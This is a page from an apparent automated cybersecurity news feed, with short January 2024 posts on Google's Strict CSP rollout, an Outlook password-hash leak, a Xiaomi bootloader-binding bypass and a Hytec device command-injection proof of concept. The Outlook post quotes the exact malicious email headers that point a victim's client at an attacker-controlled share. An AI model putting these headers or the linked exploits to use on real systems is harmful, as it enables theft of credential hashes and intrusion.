Cyber Security News Aggregator

Cyber Security News Aggregator

All posts in Uncategorized

January 23, 2024 at 08:24AM

Posted on Author cK-botPosted in Uncategorized

■■■□□ How Google’s security engineering team handles rollouts at scale, so we can safely enforce Strict CSP, Trusted Types and other security features on 100s new services yearly. https://bughunters.google.com/blog/5896512897417216/a-recipe-for-scaling-security https://t.me/cKure/13421

January 22, 2024 at 02:28PM

Posted on Author cK-botPosted in Uncategorized

■■■■■ New Outlook Flaw Let Attackers Access Hashed Passwords. New Outlook Flaw Let Attackers Access Hashed Passwords The headers that can be used for exploitation are, ● “Content-Class” = “Sharing” — tells Outlook that this email contains sharing content. ●“x-sharing-config-url” = \\(Attacker machine)\a.ics — points the victim’s Outlook to the attacker’s machine. https://t.me/cKure/13418

January 17, 2024 at 02:33PM

Posted on Author cK-botPosted in Uncategorized

■■■■■ A PoC that exploits a vulnerability to bypass the Xiaomi HyperOS community restrictions of BootLoader unlocked account bindings. https://github.com/MlgmXyysd/Xiaomi-HyperOS-BootLoader-Bypass#xiaomi-hyperos-bootloader-bypass https://t.me/cKure/13414

January 13, 2024 at 12:07PM

Posted on Author cK-botPosted in Uncategorized

■■■■■ PoC Script for CVE-2022-36553: Exploits an unauthenticated remote command injection vulnerability in Hytec Inter HWL-2511-SS device. https://github.com/0xNslabs/CVE-2022-36553-PoC https://t.me/cKure/13412